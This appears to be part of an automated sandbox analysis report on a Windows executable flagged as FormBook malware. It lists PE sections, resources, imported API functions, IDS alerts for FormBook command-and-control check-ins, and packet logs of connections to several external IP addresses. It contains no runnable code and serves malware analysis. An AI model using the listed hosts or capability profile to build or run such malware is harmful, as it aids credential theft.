                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x62a38.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc70000x62a380x62c00ca8088d853d25d714e18042a796d576bFalse0.9329979232594937data7.905946897196692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcf7b80x59cffdata1.0003289196484637
                                                        RT_GROUP_ICON0x1294b80x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x1295300x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x1295440x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x1295580x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x12956c0xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x1296480x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-11T02:53:41.780016+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049971162.0.215.9180TCP
                                                        2025-01-11T02:54:05.302271+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049975194.58.112.17480TCP
                                                        2025-01-11T02:54:18.704444+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049979199.192.23.12380TCP
                                                        2025-01-11T02:54:32.005451+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104998366.29.146.7880TCP
                                                        2025-01-11T02:54:45.193298+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104998784.32.84.3280TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 11, 2025 02:53:41.185281992 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.190241098 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.190382004 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.200656891 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.205641985 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779856920 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779872894 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779884100 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779895067 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779905081 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779916048 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779927015 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.779939890 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.780015945 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.780056953 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.780478954 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.780498028 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.780538082 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.780627012 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:41.780667067 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.785581112 CET4997180192.168.2.10162.0.215.91
                                                        Jan 11, 2025 02:53:41.793304920 CET8049971162.0.215.91192.168.2.10
                                                        Jan 11, 2025 02:53:56.951029062 CET4997280192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:56.955847025 CET8049972194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:53:56.955928087 CET4997280192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:56.971138954 CET4997280192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:56.976062059 CET8049972194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:53:57.649286985 CET8049972194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:53:57.649465084 CET8049972194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:53:57.649555922 CET4997280192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:58.482671976 CET4997280192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:59.501442909 CET4997380192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:59.506340027 CET8049973194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:53:59.506453037 CET4997380192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:59.520834923 CET4997380192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:53:59.525667906 CET8049973194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:00.195969105 CET8049973194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:00.195998907 CET8049973194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:00.196094036 CET4997380192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:01.029802084 CET4997380192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:02.048032045 CET4997480192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:02.053073883 CET8049974194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:02.053143978 CET4997480192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:02.068490982 CET4997480192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:02.073493958 CET8049974194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:02.073559046 CET8049974194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:02.756947994 CET8049974194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:02.757038116 CET8049974194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:02.757108927 CET4997480192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:03.588948011 CET4997480192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:04.595427990 CET4997580192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:04.603888035 CET8049975194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:04.603971004 CET4997580192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:04.613801956 CET4997580192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:04.622392893 CET8049975194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:05.302099943 CET8049975194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:05.302160978 CET8049975194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:05.302270889 CET4997580192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:05.304922104 CET4997580192.168.2.10194.58.112.174
                                                        Jan 11, 2025 02:54:05.311203003 CET8049975194.58.112.174192.168.2.10
                                                        Jan 11, 2025 02:54:10.329018116 CET4997680192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:10.333878040 CET8049976199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:10.334007978 CET4997680192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:10.352336884 CET4997680192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:10.357398033 CET8049976199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:10.942410946 CET8049976199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:10.942461014 CET8049976199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:10.942507982 CET4997680192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:11.858239889 CET4997680192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:12.876884937 CET4997780192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:12.881906033 CET8049977199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:12.881997108 CET4997780192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:12.898633957 CET4997780192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:12.903455973 CET8049977199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:13.473365068 CET8049977199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:13.473556042 CET8049977199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:13.473666906 CET4997780192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:14.404647112 CET4997780192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:15.480308056 CET4997880192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:15.487270117 CET8049978199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:15.487365007 CET4997880192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:15.537826061 CET4997880192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:15.544555902 CET8049978199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:15.546734095 CET8049978199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:16.082485914 CET8049978199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:16.082597971 CET8049978199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:16.082653046 CET4997880192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:17.045325994 CET4997880192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.068299055 CET4997980192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.074465036 CET8049979199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:18.074548006 CET4997980192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.151704073 CET4997980192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.156692028 CET8049979199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:18.703166008 CET8049979199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:18.704267979 CET8049979199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:18.704443932 CET4997980192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.714741945 CET4997980192.168.2.10199.192.23.123
                                                        Jan 11, 2025 02:54:18.721750021 CET8049979199.192.23.123192.168.2.10
                                                        Jan 11, 2025 02:54:23.746654987 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:23.751688957 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:23.751790047 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:23.766625881 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:23.771487951 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.351911068 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.351939917 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.351958036 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.352029085 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:24.352143049 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.352159977 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.352185011 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:24.352207899 CET804998066.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:24.352256060 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:25.279793024 CET4998080192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:26.298382998 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:26.303303957 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.303529024 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:26.318356991 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:26.323199034 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896034956 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896056890 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896066904 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896079063 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896090031 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896100998 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:26.896104097 CET804998166.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:26.896159887 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:27.826668024 CET4998180192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:28.845247984 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:28.853023052 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:28.853159904 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:28.867861986 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:28.876563072 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:28.878886938 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465712070 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465744019 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465749979 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465754032 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465756893 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465770006 CET804998266.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:29.465869904 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:29.465976954 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:30.375345945 CET4998280192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:31.392568111 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:31.397476912 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:31.397552967 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:31.406265020 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:31.411088943 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005224943 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005242109 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005254030 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005268097 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005279064 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005290985 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005309105 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005326033 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005341053 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005352974 CET804998366.29.146.78192.168.2.10
